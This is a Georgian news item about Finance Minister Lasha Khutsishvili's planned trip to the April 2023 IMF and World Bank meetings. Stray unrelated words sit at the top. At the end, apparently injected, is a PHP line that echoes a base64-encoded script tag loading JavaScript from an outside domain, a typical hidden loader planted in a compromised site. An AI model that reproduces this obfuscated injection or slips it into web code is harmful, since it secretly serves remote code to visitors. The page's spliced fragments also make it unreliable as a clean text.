celsiusi
ავერსი საქკაბელი

2023 წლის 9-17 აპრილს, საქართველოს ფინანსთა მინისტრი ლაშა ხუციშვილი საერთაშორისო სავალუტო ფონდისა და მსოფლიო ბანკის წლიურ შეხვედრაში მიიღებს მონაწილეობას.

ფინანსთა სამინისტროს მიერ გავრცელებული ინფორმაციით, ვიზიტის ფარგლებში, აშშ-ის სახელმწიფო დეპარტამენტსა და კომერციის დეპარტამენტში, აშშ-ის ხაზინაში, საერთაშორისო საფინანსო ინსტიტუტებისა და სხვადასხვა დონორი ორგანიზაციის წარმომადგენლებთან მაღალი დონის შეხვედრებია დაგეგმილი.

ფინანსთა მინისტრი მსოფლიო ბანკის ვიცე-პრეზიდენტ ანტონელა ბასანის, საერთაშორისო სავალუტო ფონდის მმართველი დირექტორის მოადგილე ბო ლის შეხვდება.

ორმხრივი მოლაპარაკებები, ასევე, შედგება საერთაშორისო სავალუტო ფონდსა და მსოფლიო ბანკში, საერთაშორისო საფინანსო კორპორაციაში, სარეიტინგო და საინვესტიციო კომპანიების წარმომადგენლებთან.

დაგეგმილია ლაშა ხუციშვილის გამოსვლა მაღალი დონის დისკუსიაზე: „გლობალური რისკების დაძლევა - სახელმწიფო ვალის მართვის შესაძლებლობების განვითარება“.

მინისტრის თანმხლებ პირებს წარმოადგენენ ფინანსთა მინისტრის პირველი მოადგილე გიორგი კაკაურიძე, მინისტრის მოადგილეები ეკატერინე გუნცაძე და მირზა გელაშვილი.

 

493
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");